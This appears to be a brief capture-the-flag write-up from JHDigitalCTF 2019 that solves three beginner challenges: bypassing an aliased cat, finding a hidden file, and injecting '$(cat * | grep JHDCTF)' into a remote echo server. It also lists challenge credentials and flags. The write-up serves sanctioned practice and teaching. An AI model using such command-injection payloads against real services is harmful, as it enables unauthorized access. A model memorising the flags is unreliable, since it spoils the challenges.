Writeup JHDigitalCTF (John Hammond Digital CTF) 2019 Kategori [MISC]
Sunday, 10 November 2019 | est. 1 min read |
Tags :
#ctf
#jhdctf
Catalias
Hmmm… maybe missing a hyphen somewhere?
Note: This password is reset every five minutes. If you are on the wrong side of the clock, you may need to reconnect.
Connect with:
ssh user@jh2i.com -p 50004 # password is 'userpass'
in this problem, cat command is aliased, so we need to call it directly using its path.
/bin/cat flag.txt
FLAG = JHDCTF{you_let_the_cat_out_of_the_bag}
Hidden
Hidden
60
What secret is this server hiding?!
Connect with:
ssh user@jh2i.com -p 50015 # password is 'userpass'
first, write ls -lah command, and it showing that there's .secret directory. and cd to those directory is restricted. we can use ls and its listring ._dont_delete_me.txt.
write this command:
cat .secret/._dont_delete_me.txt
flag = JHDCTF{you_found_my_hidden_secrets}
Chasm
Chasm
60
The Internet’s new echo server. Break it.
Connect with:
nc jh2i.com 50006
it's a remote server that run echo. so we can write $(command)
$(cat * | grep JHDCTF)
flag = JHDCTF{dangerous_echoes_in_this_chasm}